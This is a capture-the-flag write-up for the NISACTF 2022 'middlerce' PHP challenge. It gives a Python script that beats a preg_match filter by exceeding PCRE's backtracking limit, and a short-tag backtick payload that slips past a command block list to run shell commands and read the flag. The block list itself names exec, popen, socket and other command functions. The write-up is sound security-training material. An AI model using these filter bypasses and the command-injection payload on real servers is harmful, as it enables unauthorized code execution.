NSS [NISACTF 2022]middlerce
When opening the topic, the source code was given directly.
$command = json_decode($txw4ever,true)['cmd'];
It can be obtained from the statement that $txw4ever
it must be json
formatted data, but preg_match()
the function filters it {
. At the same time , .*
the greedy matching then matches the characters in the brackets, and finally .*
ends. The seemingly impeccable filtering can actually be bypassed using the PCRE backtracking limit .
In order to prevent regular expression denial of service attacks (reDOS), PHP sets an upper limit for the number of backtracking times for pcre pcre.backtrack_limit defaults to 1000000. If it exceeds 1000000, it will not return 1 or 0 but false, which means it exceeds the limit.
$_REQUEST
GET and POST data can be received. Since GET is not suitable for sending requests that are too long, we choose to use POST here.
Payload generation script:
import requests
payload = '{"cmd":"cmd", "a":"'+'#'*1000000+'"}'
res = requests.post("http://node4.anna.nssctf.cn:28035/",data = {
"letter":payload})
print(res.text)
The script sends a packet and finds no return 再加把油喔
, indicating that preg_match()
the function has been successfully bypassed.
Then we need to consider how [command] bypasses checkdata()
function detection.
checkdata()
The regular filtering of the function is as follows:
/\^|\||\~|assert|print|include|require|\(|echo|flag|data|php|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk|tcp|cat|tac/i
This question is a black box, you can also fuzz it yourself and the result will remain the same.
The filtering is very poor, and relying on functions to execute commands will not work. Then we use short labels + backticks for command execution.
?><?= `nl /f*`?>
To explain, <?=?>
it is equivalent to <? echo>
the first part of the payload ?>
being used for closing, and the last part of the payload is equivalent to echo
+ 反引号
executing the command.
Successfully got the flag.